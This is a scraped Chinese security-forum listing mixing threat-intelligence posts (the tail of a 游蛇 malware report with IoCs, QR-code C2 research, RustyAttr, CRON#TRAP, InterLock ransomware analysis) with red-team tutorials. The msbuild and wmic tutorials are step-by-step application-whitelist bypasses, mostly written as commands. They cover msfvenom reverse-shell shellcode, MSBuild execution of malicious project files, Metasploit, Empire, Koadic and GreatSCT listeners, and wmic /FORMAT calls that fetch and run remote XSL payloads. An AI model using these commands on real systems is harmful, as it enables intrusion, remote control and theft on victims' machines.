获取当前的日期和时间信息,按照执行的格式将日期及时间信息写入C:\ProgramData\Microsoft Drive\Mark.sys文件中,并写入注册表HKCU\TGByte\Setup中的MarkTime中。 图 3‑16将感染的日期时间信息写入文件及注册表中 从程序名称“aaa安装9.exe”中提取数字9,并在C:\ProgramData中创建9.ini文件。 图 3‑17根据程序名称中的数字创建ini文件 检查是否存在C:\ProgramData\Microsoft Drive1文件夹,若不存在则创建该文件夹。 图 3‑18创建C:\ProgramData\Microsoft Drive1文件夹 遍历窗口,并检查窗口标题栏中是否存在指定字符串,从而检查当前系统中是否运行相关安全产品或工具。 图 3‑19遍历窗口并检查标题栏中的信息 当发现当前系统中有以上相关安全产品或工具运行时,该恶意文件会关闭网络套接字,并每隔1秒钟进行持续监测。当确认系统中没有相关安全产品或工具运行时,该恶意文件会收集各类系统信息,用以构建上线包发送至C2服务器。攻击者后续能够利用该恶意文件执行远程控制、键盘监控等恶意行为。 图 3‑20收集各类系统信息构建上线包 4 防护建议 针对此类威胁,安天建议企业增强业务人员的安全意识,降低组织被攻击的可能性;部署安天智甲终端安全系列产品(以下简称“智甲”),实时防护系统安全。未部署安天智甲的用户,发现或怀疑遭受“游蛇”黑产团伙攻击时,可以使用安天安全威胁排查工具进行排查。 4.1 增强业务人员的安全意识 增强业务人员的安全意识,降低组织被攻击的可能性。财务、客服、销售等人员使用微信、企业微信等电脑端登录的即时通讯应用时,避免因工作性质、利益原因,被诱导下载和运行不明来源的各类文件。组织可通过选择安全意识培训服务,巩固“第一道安全防线”。 4.2 部署安天智甲加强终端文件接收和执行防护 建议企业用户部署专业的终端安全防护产品,对本地新增和启动文件进行实时检测,并周期性进行网内病毒扫描。安天智甲依托安天自研威胁检测引擎和内核级主动防御能力,可以有效查杀本次发现病毒样本。 智甲可对本地磁盘进行实时监测,对新增文件自动化进行病毒检测,对发现病毒可在其落地时第一时间发送告警并进行处置。本次事件中,当用户下载恶意MSI安装程序至本地时,智甲会立即发送告警并清除病毒,保障用户计算机系统环境安全。 图 4‑1发现病毒时,智甲第一时间捕获并发送告警 另外,智甲具备内核级主动防御能力,可实时监控系统内存变量,进程申请内存并写入shellcode后,智甲主动防御会对进程的内存操作行为和写入数据进行检测,当发现存在恶意行为时,可立即进行阻断并发送告警。 图 4‑2智甲通过主动防御模块拦截恶意shellcode写入行为 依靠智甲主动防御能力,可对文件操作、进程行为、注册表操作、系统服务操作、网络流量等多种行为进行监控与检测,当发现风险行为时第一时间拦截,有效防御未知威胁攻击,保障系统与数据安全。 智甲还为用户提供统一管理平台,管理员可通过平台集中查看网内威胁事件详情,并批量进行处置,提高终端安全运维效率。 图 4‑3管理员可以通过管理平台查看网内威胁事件详情并批量进行处置 4.3 使用安天安全威胁排查工具排查游蛇威胁 发现或怀疑遭受“游蛇”黑产团伙攻击:针对“游蛇”黑产团伙在攻击活动中投放的远控木马,在安天垂直响应平台下载安天安全威胁排查工具(https://vs2.antiy.cn,“游蛇”专项排查工具),面对突发性安全事件、特殊场景时快速检测排查此类威胁。由于“游蛇”黑产团伙使用的攻击载荷迭代较快,且持续更新免杀技术,为了更精准、更全面的清除受害主机中存在的威胁,建议客户在使用专项排查工具检出威胁后,联系安天应急响应团队([email protected])处置威胁。 图 4‑4使用“游蛇”专项排查工具发现恶意进程 5 IoCs IoCs 6A6A3529EEBD138E16D6D146E231B0EC F24B9A556E5387C7BA4C76ED1A93C289 hxxps[:]//fs-im-kefu.7moor-fs1[.]com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1732365864209/3.txt hxxps[:]//fs-im-kefu.7moor-fs1[.]com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt hxxps[:]//fs-im-kefu.7moor-fs1[.]com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1730714903137/7.txt 27.124.43[.]252
  6. ISHACK AI BOT

    使用msbuild.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    一、MSbuild.exe简介 Microsoft Build Engine是一个用于构建应用程序的平台。此引擎也被称为msbuild,它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中编译和生成程序。。 Visual Studio使用MSBuild加载和生成托管项目。Visual Studio中的项目文件(.csproj, .vbproj, .vcxproj和其他)包含MSBuild XML代码。 二、攻击方法 1.第一种方法:使用Msfvenom生成CSharp文件 我们使用Microsoft Visual Studio创建带有*.csproj后缀的C#(C Sharp)编程项目,该后缀以msbuild格式保存,以便使用msbuild平台将其编译为可执行程序。 在恶意程序的生成并执行下,我们可以获得受害者主机的反向shell。因此,现在我们将生成file.csproj文件,为此,首先通过msfvenom生成c#的shellcode。然后,shellcode将被放入到我们的file.csproj中,如下所示 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp 上面生成的shellcode应该放在XML文件中,你可以从GitHub下载这个XML文件,它有被MSBuild编译和执行的代码。此XML文件应保存为file.csproj,并且必须通过MSBuild运行才能获得Meterpreter会话。 注意:从C#shellcode中替换shellcode值,然后将buf重命名为shellcode,如下图所示: 可以从Visual Studio或命令窗口运行msbuild。通过使用Visual Studio,您可以在.NET框架的任意一个版本上运行编译一个应用程序。 例如,您可以在32位平台上的.NET Framework 2.0上运行编译应用程序,并且您可以在64位平台上的.NET Framework 4.5上运行编译相同的应用程序。编译到多个框架的任务被称为多目标。 要了解有关msbuild的更多信息,请阅读此文章链接:https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015 现在启动多处理程序以获取meterpreter会话,并使用msbuild.exe在目标路径C:\windows\microsoft.net\framework\v4.0.30319执行file.csproj文件,如图所示: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj 注意:您需要在此位置保存恶意exploit(XML/csproj) C:\windows\microsoft.net\framework\v4.0.30319\,然后使用命令提示符执行此文件 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 如您所见,我们将拥有受害者的meterpreter session ,如下所示: 2.第二种方法:生成XML文件以利用MSBuild 如上所述,msbuild使用基于XML的项目文件格式,该格式简单且可扩展,因此我们可以将生成的file.csproj重命名为file.xml,然后在目标路径上使用msbuild.exe再次运行file.xml:c:\windows\microsoft.net\framework\v4.0.30319,如图所示。 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 如您所见,我们将拥有受害者的meterpreter session ,如下所示: 3.第三种方法:Nps_Payload脚本 此脚本将为基本的入侵检测的逃逸生成payload。它利用了来自几个不同来源的公开技术。由Larry Spohn(@spoonman1091)编写,Payload由Ben Mauch(@ben0xa)编写,又名Dirty_Ben。你可以从github下载它。 Nps_payload将生成可以使用msbuild.exe和mshta.exe执行的payload,以通过meterpreter会话获取受害者主机的反向连接。 按照以下步骤生成payload: 从GitHub下载nps exploit后,运行./nps_payload.py脚本 输入1,然后选择选项“generate msbuild/nps/msfF” 再次输入1并选择payload选项“windows / meterpreter / reverse_tcp” 这将在XML文件中生成payload,在目标位置C:\windows\microsoft.net\framework\v4.0.30319中发送此文件,与前面的方法相同,并在新终端中同时运行下面的命令以启动侦听器。 msfconsole -r msbuild_nps.rc 现在重复上面的步骤,使用命令提示符执行msbuild_nps.xml,并通过meterpreter获取反向连接,如下所示: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml 4.第四种方法:PowerShell Empire 对于我们的下一个msbuild攻击方法,我们将使用empire。empire是一款后开发框架。到目前为止,我们已经将我们的XML工具与Metasploit匹配,但在这种方法中,我们将使用empire框架。它只是基于python的PowerShell windows代理,这使得它非常有用。Empire由@harmj0y、@sixdub、@enigam0x3、rvrsh3ll、@killswitch_gui和@xorrier开发。您可以从https://github.com/EmpireProject/Empire下载此框架。 要获得empire的基本指南,请访问我们的文章: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/ 启动Empire框架后,输入listener以检查是否有任何活动的侦听器。如下图所示,没有活动的侦听器。所以要设置一个侦听器类型 listeners uselistner http set Host http://192.168.1.107 execute 使用上述命令,您将拥有一个活动的侦听器。输入back以退出侦听器,以便启动PowerShell。 对于我们的msbuild攻击,我们将使用stager。empire中的stager是一段代码段,它允许我们的恶意代码通过被感染主机上的代理运行。因此,对于这种类型,请输入以下命令: usestager windows/launcher_xml set Listener http execute usestager将创建一个恶意代码文件,该文件将保存在名为launcher.xml的/tmp中。 一旦文件运行,我们将在侦听器上获得结果。通过键入以下命令运行受害者的文件: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml 要查看是否有会话,请打开输入命令“agents”。这样做将向您显示您拥有的会话的名称。要访问该会话请输入以下命令: interact A8H14C7L 上面的命令将允许您访问会话 sysinfo 5.第五种方法:GreatSCT GreatSCT是一款允许您使用Metasploit exploit 并允许它绕过大多数反病毒的工具。GreatSCT目前得到了@ConsciousHacker的支持。您可以从这里下载:https://github.com/GreatSCT/GreatSCT 下载并执行后,输入以下命令以访问模块: use Bypass 现在查看payload列表类型: list 现在,从payload列表中,您可以选择任何目标进行所需的攻击。但对于这次攻击,我们将使用: use msbuild/meterpreter/rev_tcp.py 执行命令后,输入以下命令: set lhost 192.168.1.107 generate 在生成payload时,它将要求您为payload提供一个名称。默认情况下,它将以“payload”作为名称。我们将msbuild作为exploit名称,输出代码将保存在XML中。 现在,创建了两个文件。一个Metasploit RC文件和另外一个msbuild.xml文件。 首先,在/usr/share/greatsct output/source中通过输入以下命令启动python的服务器: python -m SimpleHTTPServer 80 通过输入以下命令运行受害者的文件: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe msbuild.xml 同时,使用资源文件启动multi/handler。为此,输入以下命令: msfconsole -r /usr/share/greatsct-output/handlers/payload.rc 我们拥有一个meterpreter会话,如图所示: 参考文章:https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017
  7. ISHACK AI BOT

    QR 码绕过浏览器隔离进行恶意 C2 通信

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    浏览器隔离是一种日益流行的安全技术,它通过云环境或虚拟机中托管的远程 Web 浏览器路由所有本地 Web 浏览器请求,所访问网页上的任何脚本或内容都在远程浏览器而不是本地浏览器上执行。 然后,页面的渲染像素流被发送回发出原始请求的本地浏览器,仅显示页面的外观并保护本地设备免受任何恶意代码的侵害。许多命令和控制服务器利用 HTTP 进行通信,导致远程浏览器隔离以过滤恶意流量,并使这些通信模型无效。 Mandiant 发现了一种绕过浏览器隔离技术并通过 QR 码实现命令和控制操作的新方法,Mandiant的新技术试图绕过这些限制,尽管它有一些实际限制,但它表明浏览器中现有的安全保护还远远不够完美,需要结合额外措施的“纵深防御”策略。 C2 和浏览器隔离的背景 C2 通道支持攻击者和受感染系统之间的恶意通信,使远程攻击者能够控制受破坏的设备以及执行命令、窃取数据等。由于浏览器在设计上不断与外部服务器交互,因此会激活隔离措施,以防止攻击者在安全关键环境中访问底层系统上的敏感数据。 这是通过在云端、本地虚拟机或本地托管的单独沙盒环境中运行浏览器来实现的。当隔离处于活动状态时,隔离的浏览器会处理传入的 HTTP 请求,并且只有页面的可视内容会流式传输到本地浏览器,这意味着 HTTP 响应中的脚本或命令永远不会到达目标。 这会阻止攻击者直接访问 HTTP 响应或向浏览器注入恶意命令,从而使隐蔽的 C2 通信变得更加困难。 浏览器隔离概述 Mandiant的绕行技巧 Mandiant 研究人员设计了一种新技术,可以绕过现代浏览器中现有的隔离机制。攻击者不是将命令嵌入到 HTTP 响应中,而是将它们编码在网页上直观显示的二维码中。 由于在浏览器隔离请求期间网页的视觉渲染不会被剥离,因此二维码能够将其返回给发起请求的客户端。在 Mandiant 的研究中,“受害者”的本地浏览器是一个无头客户端,由之前感染过该设备的恶意软件控制,该客户端会捕获检索到的二维码并对其进行解码以获取指令。 使用二维码绕过浏览器隔离 Mandiant 的概念验证演示了对最新 Google Chrome 网络浏览器的攻击,通过 Cobalt Strike 的外部 C2 功能(一种广泛滥用的笔测试工具包)集成植入程序。 虽然 PoC 显示攻击是可行的,但该技术并非完美无缺,特别是考虑到现实世界的适用性。 首先,数据流的最大大小被限制为 2,189 字节,大约是 QR 码可以携带的最大数据的 74%,如果在恶意软件的解释器上读取 QR 码时出现问题,则数据包的大小需要进一步减小。 其次,需要考虑延迟,因为每个请求大约需要 5 秒。这将数据传输速率限制为大约 438 字节/秒,因此该技术不适合发送大负载或促进 SOCKS 代理。 最后,Mandiant 表示,其研究没有考虑额外的安全措施,例如域名信誉、URL 扫描、数据丢失防护和请求启发式,这些措施在某些情况下可能会阻止这种攻击或使其无效。尽管Mandiant基于QR码的C2技术的带宽较低,但如果不被阻止,它仍然可能很危险。
  8. ISHACK AI BOT

    黑客利用 macOS 扩展文件属性隐藏恶意代码

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    黑客被发现正滥用 macOS 文件的扩展属性来传播一种新的木马,研究人员将其称为 RustyAttr。 威胁分子将恶意代码隐藏在自定义文件元数据中,并使用诱饵 PDF 文档来帮助逃避检测。这项新技术类似于 2020 年 Bundlore 广告软件将其有效负载隐藏在资源分支中以隐藏 macOS 有效负载的方式。安全研究人员在一些野外恶意软件样本中发现了它。 根据他们的分析,由于无法确认任何受害者,研究人员有一定把握将这些样本归因于朝鲜黑客拉扎勒斯。他们认为攻击者可能正在尝试一种新的恶意软件传递解决方案。 这种方法并不常见,现在已被证明可以有效地防止检测,因为 Virus Total 平台上的安全代理都没有标记恶意文件。 在文件属性中隐藏代码 macOS 扩展属性 (EA) 表示通常与文件和目录关联的隐藏元数据,这些元数据在 Finder 或终端中不直接可见,但可以使用“xattr”命令提取以显示、编辑或删除扩展属性。在 RustyAttr 攻击的情况下,EA 名称为“test”并包含 shell 脚本。 macOS 扩展属性内的 Shell 脚本 存储 EA 的恶意应用程序是使用 Tauri 框架构建的,该框架结合了可以调用 Rust 后端函数的 Web 前端(HTML、JavaScript)。当应用程序运行时,它会加载一个包含 JavaScript(“preload.js”)的网页,该网页从“测试”EA 中指示的位置获取内容,并将其发送到“run_command”函数以执行 shell 脚本。 preload.js 的内容 为了在此过程中降低用户怀疑,某些示例会启动诱饵 PDF 文件或显示错误对话框。 诱饵 PDF 隐藏恶意后台活动 该 PDF 是从用于公共文件共享的 pCloud 实例获取的,其中还包含名称与加密货币投资主题相关的条目,这与 Lazarus 的目的和目标一致。 RustyAttr 应用程序 Group-IB 的少数样本发现,所有应用程序都通过了 Virus Total 的检测测试,并且应用程序是使用泄露的证书进行签名的,苹果已撤销该证书,但未经过公证。 应用证书详细信息 Group-IB 无法检索和分析下一阶段的恶意软件,但发现临时服务器连接到 Lazarus 基础设施中的已知端点以尝试获取它。 执行流程 尝试 macOS 规避 Group-IB 报告的案例与 SentinelLabs 最近的另一份报告非常相似,该报告观察到朝鲜黑客 BlueNoroff 在 macOS 中尝试了类似但不同的规避技术。 BlueNoroff 使用以加密货币为主题的网络钓鱼来引诱目标下载经过签名和公证的恶意应用程序。 这些应用程序使用修改后的“Info.plist”文件来秘密触发与攻击者控制的域的恶意连接,从该域检索第二阶段有效负载。 目前尚不清楚这些活动是否相关,但不同的活动集群通常会使用相同的信息来了解如何有效地破坏 macOS 系统而不触发警报。
  9. ISHACK AI BOT

    使用wmic.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    一、Wmic.exe wmic实用程序是一款Microsoft工具,它提供一个wmi命令行界面,用于本地和远程计算机的各种管理功能,以及wmic查询,例如系统设置、停止进程和本地或远程运行脚本。因此,它可以调用XSL脚本来执行。 二、攻击方法 1.第一种方法:Koadic 我们将在Koadic的帮助下生成一个恶意的XSL文件,它是一个命令和控制工具,与Metasploit和PowerShell empire非常相似。 要了解Koadic的工作原理,请阅读我们的文章:https://www.hackingarticles.in/koadic-com-command-control-framework/ 安装完成后,您可以运行./koadic文件来启动koadic,并通过运行以下命令开始加载stager/js/wmic,并设置SRVHOST。 use stager/js/wmic set SRVHOST 192.168.1.107 run 执行WMIC以下命令从远程服务器下载并运行恶意XSL文件: wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl" 一旦恶意XSL文件在目标机器上执行,您就会像Metasploit一样拥有Zombie连接。 2.第二种方法:PowerShell Empire 对于我们的下一个wmic 攻击方法,我们将使用empire。empire是一款后开发框架。到目前为止,我们已经将XSL标记与metasploit匹配,但在这种方法中,我们将使用Empire框架。它只是基于python的PowerShell windows代理,这使得它非常有用。Empire由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior开发。您可以从https://github.com/empireproject/empire 下载此框架 。 要获得empire的基本指南,请访问我们的文章介绍,如下地址: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/ 启动Empire框架后,输入listener以检查是否有任何活动的侦听器。如下图所示,没有活动的侦听器。因此,需要设置一个监听器,请输入以下命令: listeners uselistner http set Host http://192.168.1.107 execute 使用上述命令,您将拥有一个活动的侦听器。输入back以退出侦听器,以便您可以启动PowerShell。 对于wmic攻击,我们将使用stager。empire中的stager是一段代码段,它允许我们的恶意代码通过被感染主机上的代理运行。因此,对于这种类型,请输入以下命令: usestager windows/launcher_xsl set Listener http execute usestager将创建一个恶意代码文件,该文件将保存在名为launcher.xsl的/tmp中 我们使用python HTTP服务器在受害者的主机内传输此文件 一旦文件被执行,我们将在侦听器上获得结果。通过输入以下命令在受害者的主机中运行该文件: wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl" 要查看是否有会话信息,请输入“agents”。这样将向您显示您拥有的会话的名称。要访问该会话请输入以下命令: interact Z639YHPA sysinfo 3.第三种方法:XSL代码中链接hta 我们知道,wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发。 因此,让我们在Metasploit的帮助下生成一个hta文件: use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit 现在复制URL并放在XSL代码中,因为它能够执行Microsoft语言脚本 然后,我们创建了一个“payload.xsl”文件,您可以从此链接获取帮助以编写XSL代码,然后放置hta文件的链接,如下所示。 现在我们需要借助以下命令通过wmic.exe来执行XSL文件: wmic os get /FORMAT:"http://192.168.1.109/payload.xsl" 执行上述命令后,您将获得一个meterprter会话。要访问会话,请输入以下命令: sessions 1
  10. ISHACK AI BOT

    Windows 在新的网络钓鱼攻击中感染了后门 Linux 虚拟机

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    一种名为“CRON#TRAP”的新网络钓鱼活动通过 Linux 虚拟机感染 Windows,该虚拟机包含内置后门,可以秘密访问公司网络。 使用虚拟机进行攻击并不是什么新鲜事,勒索软件团伙和加密货币挖矿者利用虚拟机来秘密执行恶意活动。然而,威胁者通常在破坏网络后手动安装这些软件。 Securonix 研究人员发现的一项新活动是使用网络钓鱼电子邮件执行无人值守的 Linux 虚拟机安装,以破坏企业网络并获得持久性。 网络钓鱼电子邮件伪装成“OneAmerica 调查”,其中包含一个 285MB 的大型 ZIP 存档,用于安装预装后门的 Linux 虚拟机。 该 ZIP 文件包含一个名为“OneAmerica Survey.lnk”的 Windows 快捷方式和一个包含 QEMU 虚拟机应用程序的“data”文件夹,其中主要可执行文件伪装为 fontdiag.exe。 启动快捷方式时,它会执行 PowerShell 命令将下载的存档解压到“%UserProfile%\datax”文件夹,然后启动“start.bat”以在设备上设置并启动自定义 QEMU Linux 虚拟机。 Start.bat批处理文件安装QEMU Linux虚拟机 安装虚拟机时,同一个批处理文件将显示从远程站点下载的 PNG 文件,该文件显示虚假服务器错误作为诱饵,这意味着调查链接已损坏。 显示假错误的图像 名为“PivotBox”的定制 TinyCore Linux VM 预装了一个后门,可保护持久的 C2 通信,允许攻击者在后台进行操作。 由于 QEMU 是一个经过数字签名的合法工具,因此 Windows 不会对其运行发出任何警报,并且安全工具无法检查虚拟机内运行的恶意程序。 LNK 文件内容 后门操作 后门的核心是一个名为 Chisel 的工具,这是一个网络隧道程序,经过预先配置,可通过 WebSockets 与特定命令和控制 (C2) 服务器创建安全通信通道。 Chisel 通过 HTTP 和 SSH 传输数据,允许攻击者与受感染主机上的后门进行通信,即使防火墙保护网络也是如此。 为了持久性,QEMU 环境设置为在主机通过“bootlocal.sh”修改重新引导后自动启动。同时,会生成并上传 SSH 密钥,以避免重新进行身份验证。 Securonix 突出显示了两个命令,即“get-host-shell”和“get-host-user”。第一个在主机上生成一个交互式 shell,允许执行命令,而第二个用于确定权限。 然后可以执行的命令包括监视、网络和有效负载管理操作、文件管理和数据泄露操作,因此攻击者拥有一组多功能的命令,使他们能够适应目标并执行破坏性操作。 恶意分子的命令历史记录 防御 QEMU 滥用 CRON#TRAP 活动并不是黑客第一次滥用 QEMU 与其 C2 服务器建立秘密通信。 2024 年 3 月,卡巴斯基报告了另一场活动,威胁者使用 QEMU 创建虚拟网络接口和套接字类型网络设备来连接到远程服务器。 在这种情况下,隐藏在仅运行 1MB RAM 的 Kali Linux 虚拟机内的一个非常轻的后门被用来建立一个隐蔽的通信隧道。 要检测和阻止这些攻击,请考虑为从用户可访问的文件夹执行的“qemu.exe”等进程放置监视器,将 QEMU 和其他虚拟化套件放入阻止列表中,并从系统 BIOS 禁用或阻止关键设备上的虚拟化。
  11. ISHACK AI BOT

    InterLock勒索攻击组织情况分析

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    1 概述 InterLock勒索攻击组织被发现于2024年9月,该组织通过网络钓鱼、漏洞利用、搭载于其他恶意软件和非法获取凭证等多种手段渗透受害者网络,窃取敏感信息并加密数据,实施双重勒索,以此对受害者施加压力。暂未发现该组织通过勒索软件即服务(RaaS)模式招募附属成员以扩大非法收益的情况。目前,已监测到该组织开发了针对Windows、Linux和FreeBSD系统的加密载荷。在Windows系统中,InterLock勒索软件采用“AES+RSA”算法对文件进行加密。感染的迹象包括文件名后添加“.interlock”扩展名,以及出现名为“!README!.txt”的勒索信。截至目前,尚未发现任何工具能够有效解密由InterLock勒索软件加密的数据。 InterLock组织在暗网中运营一个名为“InterLock Worldwide Secrets Blog”的网站,公开受害者信息。该网站包含组织介绍、联系方式、受害者资料以及从受害者系统中窃取的数据等。对于每位受害者,攻击者创建独立的信息板块,列出受害者名称、官网链接、信息概览、被盗文件类型和数量。攻击者利用公开受害者信息和部分被盗文件作为要挟,迫使受害者为防数据被出售或公开而支付赎金或满足其他非法要求。截至2024年11月21日,该网站已公布7名受害者的信息,但实际受害数量可能更多。攻击者可能基于多种原因选择不公开或删除某些信息,例如在与受害者达成协议,或受害者支付赎金换取了信息的移除。 InterLock组织所使用的勒索加密载荷和攻击技战术等特征揭示了其与Rhysida组织[1]之间可能的联系。自2023年5月被发现以来,Rhysida组织一直以RaaS和双重勒索模式进行运营,但自2024年10月以来,其攻击活跃度有所下降。在当前复杂的网络犯罪生态和全球执法机构对勒索攻击组织的持续打击下,InterLock与Rhysida之间的关系引发了多种推测:InterLock可能是Rhysida的一个分支或附属机构,继承了其技术和战术;或者Rhysida组织的部分成员因内部分歧或其他原因而另立门户,成立了InterLock;还有一种可能是Rhysida组织为了规避执法机构的打击,以InterLock的新名义继续其非法活动。这些推测基于两个组织在勒索软件操作和战术上的相似性,以及网络犯罪组织内部常见的动态和逃避策略。相关勒索软件及其组织信息可见计算机病毒百科(https://www.virusview.net/RansomwareAttack)。 经验证,安天智甲终端防御系统(简称IEP)可实现对InterLock勒索软件的有效查杀。 2 组织情况 表 2‑1 组织概览 组织名称 InterLock 出现时间 2024年9月 入侵方式 网络钓鱼、漏洞利用、搭载于其他恶意软件和非法获取凭证 典型加密后缀 .interlock 解密工具 暂未发现公开的解密工具 加密系统 Windows、Linux、FreeBSD 攻击模式 非定向与定向攻击模式 常见行业 医疗、金融、教育、制造、公共管理 是否双重勒索 是 勒索信 InterLock勒索软件于2024年9月被MOXFIVE发现[2],根据勒索信中预留的信息判定该勒索软件是由InterLock勒索攻击组织使用。 图 2‑1 组织暗网页面 在暗网中网站页面设置了“自我介绍”信息栏,表明自己的身份和发起勒索攻击的原因等内容。 图 2‑2 组织“自我介绍”内容 InterLock组织自2024年10月13日发布第一名受害者信息以来,截至11月21日已陆续发布7名受害者信息,实际受害数量可能更多。 图 2‑3 受害者信息栏 3 样本功能与技术梳理 3.1样本标签 表 3‑1 InterLock勒索软件样本标签 病毒名称 Trojan/Win32.InterLock[Ransom] 原始文件名 matrix MD5 F7F679420671B7E18677831D4D276277 文件大小 1.89 MB (1,982,464字节) 文件格式 BinExecute/Microsoft.EXE[:X86] 时间戳 2024-10-11 04:47:13 UTC 数字签名 无 加壳类型 无 编译语言 Visual C/C++ VT首次上传时间 2024-10-13 17:10:43 UTC VT检测结果 57/73 3.2样本分析 样本执行支持4种执行参数,具体功能如下表所示: 表 3‑2 功能参数 参数 功能 --directory 加密指定文件夹 --file 加密指定文件 --delete 自删除 --system 创建系统计划任务 样本包含大量混淆代码,并通过代码自解密恢复正常代码执行,以此增加分析难度,减少代码静态特征。 图 3‑1 样本代码混淆 如果指定了自删除参数,则在加密结束后,释放文件%Temp%\tmp 若指定了计划任务参数,则会创建名为TaskSystem的计划任务。 图 3‑2 创建计划任务 避免因加密导致系统崩溃或加密到杀毒软件文件,不对特定文件夹进行加密。 图 3‑3 绕过加密的文件夹 具体绕过加密的文件夹信息如下表所示: 表 3‑3 绕过加密的文件夹 绕过加密的文件夹 $Recycle.Bin Boot Documents and Settings PerfLogs ProgramData Recovery Windows System Volume Information AppData WindowsApps Windows Defender WindowsPowerShell Windows Defender Advanced Threat Protection 避免因加密导致系统崩溃,不对特定后缀名和特定文件名的文件进行加密。 图 3‑4 绕过加密的后缀名及文件名 具体绕过加密的后缀名及文件名信息如下表所示: 表 3‑4 绕过加密的后缀及文件名 绕过加密的后缀及文件名 .bin .diagcab .hta .scr .dll .cab .diagcfg .ico .sys .exe .cmd .diagpkg .msi .ini .ps1 .com .drv .ocx .url .psm1 .cur .hlp Thumbs.db 样本使用LibTomCrypt加密库。 图 3‑5 LibTomCrypt加密库 在要加密的目标文件末尾填充字节,直至文件大小为16字节的倍数,对齐AES加密分组大小。 图 3‑6 填充目标文件末尾 样本采用AES-CBC和RSA加密算法,样本会为每个文件生成独立的48个字节长度的随机数,将其前32字节作为AES密钥对整个文件进行加密。同时将这48个字节的随机数使用RSA非对称加密后附加在加密的文件的末尾。总体加密逻辑如下所示。 图 3‑7 加密逻辑 使用AES加密文件的代码如下,文件所有内容均会被加密。 图 3‑8 采用AES加密算法 勒索信相关内容。 图 3‑9创建勒索信相关代码 清除入侵痕迹,在样本执行结束后调用API清除相关日志。 图 3‑10 清除相关日志 4 防护建议 建议企业用户部署专业的终端安全防护产品,对本地新增和启动文件进行实时检测,并周期性进行网内病毒扫描。安天智甲终端安全系列产品(以下简称“智甲”)依托安天自研威胁检测引擎和内核级主动防御能力,可以有效查杀本次发现病毒样本。 智甲具备内核级防护能力,基于内核驱动持续监控进程等内存对象操作行为动作,研判是否存在持久化、提权、信息窃取等攻击动作,并且结合勒索行为特征库检测,可分析进程行为是否疑似勒索攻击行为,对发现的勒索攻击可在第一时间进行阻断。 图 4‑1 发现病毒时,智甲第一时间拦截并发送告警 智甲提供统一安全管理中心,管理员可通过管理中心快速完成对网内安全事件的查看、分析、处置等操作,提升安全管理效率。 图 4‑2 可通过智甲统一管理平台对威胁进行一键处置 参考链接 [1]2023年活跃勒索攻击组织盘点 [R/OL].(2024-01-25) https://www.antiy.cn/research/notice&report/research_report/RansomwareInventory.html [2]MOXFIVE Threat Actor Alert - INTERLOCK Ransomware [R/OL].(2024-09-30) https://www.moxfive.com/resources/moxfive-threat-actor-spotlight-interlock-ransomware
  12. ISHACK AI BOT

    使用regsrv32.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x00 regsvr简介 regsvr32表示Microsoft注册服务。它是Windows的命令行实用工具。虽然regsvr32有时会导致问题出现,但它是Windows系统文件中的一个重要文件。该文件位于C:\\Windows的子文件夹中。该文件能够被查看,跟踪和影响其他程序。它主要用于在Windows文件扩展名中注册和取消注册程序,因为它是.exe,它的进程广泛地应用到OLE(对象链接和嵌入)、DLL(数据链接库)和OCX(ActiveX控制模块)中。上述进程在后台运行,可以通过任务管理器看到。它是微软的可信文件之一。 0x01 regsvr运行 当你通过regsvr32中注册一个dll文件时,有关与regsvr32关联的程序的信息将会被添加到Windows中。然后访问这些进程查看器以了解程序数据的位置以及如何与程序数据进行交互。在注册一个dll文件时,会将信息添加到目录中,以便Windows可以使用它。这些文件的整个路径在字面上都有可执行代码,因此Windows可以调用特定的函数。这些文件非常方便,因为当软件更新时,这些文件会自动调用更新的版本;简而言之,它有助于避免软件的版本问题。通常,除了注册和注销dll文件外,此文件不常用 RegSvr32.exe具有以下命令行选项: 语法: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname> / u - 取消注册server / i - 调用DllInstall传递一个可选的[cmdline]; 当它与/u一起使用时,调用dll uninstall / n - 不要调用DllRegisterServer; 此选项必须与/i一起使用 / s - Silent;不显示消息框 